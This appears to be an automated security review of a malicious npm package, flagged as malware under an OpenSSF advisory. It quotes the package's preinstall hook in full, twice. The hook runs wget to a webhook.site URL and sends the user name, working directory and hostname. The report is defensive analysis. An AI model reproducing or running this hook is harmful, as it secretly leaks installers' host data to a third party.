AI Security Review
scanned 7m ago · by lpm-firewall-aiInstalling the package automatically invokes a shell command. The command gathers local user, working-directory, and host information and transmits it to a third-party webhook.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install / preinstall lifecycle execution
Impact
Leaks local environment metadata without user consent during dependency installation.
Mechanism
install-time shell-based host-environment exfiltration via wget
Attack narrative
`package.json` registers a `preinstall` hook that executes automatically during npm installation. It invokes `wget` against a webhook.site URL and embeds the current username, working directory, and hostname in the request query string, exfiltrating installation-host metadata without a package-related purpose.
Rationale
Direct source inspection confirms an unsolicited preinstall-time outbound request containing harvested local metadata. This is concrete install-time data exfiltration, not a benign package function.
Evidence
package.json
Network endpoints1
webhook.site/d32804ac-1bbb-4100-ab60-95231dd3251c/
OSV Corroboration
OpenSSF/OSVAdvisory
MAL-2026-10634
Source
OpenSSF Malicious Packages via OSV
Summary
Direct source inspection confirms an unsolicited preinstall-time outbound request containing harvested local metadata. This is concrete install-time data exfiltration, not a benign package function.
References
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `package.json` defines a `preinstall` lifecycle hook.
- The hook runs `wget` to a third-party webhook endpoint.
- It sends `whoami`, `pwd`, and `hostname` as URL query data.
- The package contains no source files beyond `package.json`; declared `index.js` is absent.
Evidence against
- No additional package source or executable payload was present to inspect.
Behavioral surface
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.preinstall = wget --quiet "https://webhook.site/d32804ac-1bbb-4100-ab60-95231dd3251c/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.preinstall = wget --quiet "https://webhook.site/d32804ac-1bbb-4100-ab60-95231dd3251c/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgFindings
1 High1 Medium1 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present